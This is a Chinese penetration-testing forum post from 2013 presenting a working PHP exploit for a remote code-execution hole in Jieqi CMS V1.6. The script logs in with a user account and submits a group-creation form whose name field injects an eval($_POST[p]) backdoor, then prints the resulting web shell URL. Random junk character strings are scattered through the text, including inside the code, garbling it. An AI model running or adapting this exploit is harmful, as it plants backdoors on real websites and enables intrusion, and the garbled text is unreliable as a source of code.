中国网络渗透测试联盟

标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP [打印本页]
作者: admin    时间: 2013-2-23 11:28
标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。! X6 B' Q7 w$ Q5 G; d( d9 K* `8 d1 ?

# j3 D9 ]; j( C  _" \; {1 |
4 U9 p* I) M+ w7 J+ z该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
7 W" @* o, f  H+ }5 Q8 f  p6 d 需要有一个能创建圈子的用户。
( ~7 y$ a6 _2 r' {
8 `7 c* ?2 O6 E8 U<?php0 r1 ]+ d3 v: u% X0 u0 q  w8 [. V
- w' N% z% Q) J
print_r('9 m2 {7 ^/ I6 C/ @" m# ^
+---------------------------------------------------------------------------+7 l8 J- A0 ]- L/ z* T/ s, {& u
Jieqi CMS V1.6 PHP Code Injection Exploit+ |8 h. g, ^( }5 m+ y+ S) n8 F
by flyh4t
- o- H3 i- e% m& D/ ]6 V- e" tmail: phpsec at hotmail dot com
$ c! m0 g  v% X& pteam: http://www.wolvez.org- c! K- p+ U, ?9 l7 C# U2 z
+---------------------------------------------------------------------------+9 Z6 v+ g+ Y$ m: g3 {% ?0 C
'); /**
' s  }  \$ `) }& ^' y * works regardless of php.ini settings
2 c  a/ D' y0 n3 g1 d4 n*/ if ($argc < 5) { print_r('
: r0 i' V# G4 b% R+ J) c. z+---------------------------------------------------------------------------+
8 D& c8 j% L" D0 _7 m# Z6 d, j: W9 Q$ C: iUsage: php '.$argv[0].' host path username
' a% K( A! J% w" S& R' ihost:      target server (ip/hostname)! D9 ~+ W" ]6 C5 [0 j; \2 G
path:      path to jieqicms 4 _3 U! \$ O7 m; p0 Q* j3 i
uasename:  a username who can create group
$ c' f/ @, T1 U: H: JExample:
" R& M' N% D3 U$ t; r" d4 x/ qphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
7 R8 y' ]' H* p: A( T  d- [8 l% T+---------------------------------------------------------------------------+  Q& j$ x$ U2 b, x- y
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799616 U( B/ @6 t* C" }# \6 R" N
Content-Disposition: form-data; name="gname"& o* Q, w# P" z1 G) N

! {# q, r! c8 z1 y0 ~'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
7 a0 q3 T+ [1 K* w2 f7 s-----------------------------23281168279961
$ n3 w. ^1 F4 N; f& J& vContent-Disposition: form-data; name="gcatid"2 q5 b1 w0 h9 ~# ~$ W! E7 u

2 Z- P5 F1 H2 }0 y5 Z) a' q" Y) f1
; O- s% P- B( t' A9 t$ F-----------------------------23281168279961
* L2 b* L7 n# `$ Z" j/ aContent-Disposition: form-data; name="gaudit", Z! f2 O9 E+ z1 J

- Z- B6 i6 r- `5 S4 U! |1 y1( j7 W+ s# @7 x6 D( H& ]. \
-----------------------------23281168279961
) l& |  b+ T: V# F1 @Content-Disposition: form-data; name="gbrief"
* V7 t/ x/ U# L7 K, N( f * h% [) o$ X% ]4 q7 H5 R: [
1; }1 y4 a0 {' B9 d/ X
-----------------------------23281168279961--5 f" U! o* Q! R' W2 p% ~4 A$ V
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
/ X* w& |& i% F3 c# E   {0 X6 W0 {; ]/ @. @
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2